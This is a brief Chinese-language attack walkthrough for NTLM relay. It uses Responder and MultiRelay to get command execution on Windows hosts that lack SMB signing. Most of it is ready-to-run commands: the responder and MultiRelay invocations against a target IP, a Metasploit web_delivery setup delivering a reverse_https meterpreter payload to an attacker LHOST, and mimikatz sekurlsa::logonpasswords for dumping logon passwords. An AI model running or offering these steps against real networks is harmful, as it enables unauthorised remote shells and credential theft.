net-ntlm無法進行hash直接傳遞,通過responder等中繼器拿到的net-ntlm破解也很難,所以利用responder加MultiRelay獲取一直存在的shell。
注意的一點是: NTLM的hash存放在安全賬戶管理(SAM)數據庫以及域控的NTDS.dit數據庫中。
Net—NTLM的hash是用於網絡認證(他們的基於用戶NT的hash值通過響應的算法產生的)
漏洞利用前提:
1、目標計算機上未啟用SMB簽名。
2、捕獲的用戶的SMB Auth會話必須具有特權才能獲取shell
一、配置responder
關閉smb和http監聽,因為multirelay需要使用
開啟responder監聽
-I參數為你網卡接口
responde -I wlan0 -rv
二、獲取shell
這么說不恰當,他不是一個shell,只是ntml認證讓multirelay做了,但是能執行一些命令,如poweshell,所以這么說也不過分。
cd /usr/share/responder/tools python MultiRelay.py -t 172.16.20.94 -u ALL
耐心等待會得到一個shell
一些技巧
-tf targets.txt 可以指定一個文本 -c < Powershell 代碼> 可以運行代碼如powershell,whoami -d 只是截取net-ntlm hash
三、利用
1、配合msf
use exploit/multi/script/web_delivery set URIPATH ‘/’ set target 2 set payload windows/x64/meterpreter/reverse_https set LHOST 172.16.20.94 set LPORT 6666 run
復制powershell代碼,執行獲取一個meterpreter shell
2、配合cs同上powershell
略
3、自帶的mimi 命令,提取命令
Mimi sekurlsa::logonpasswords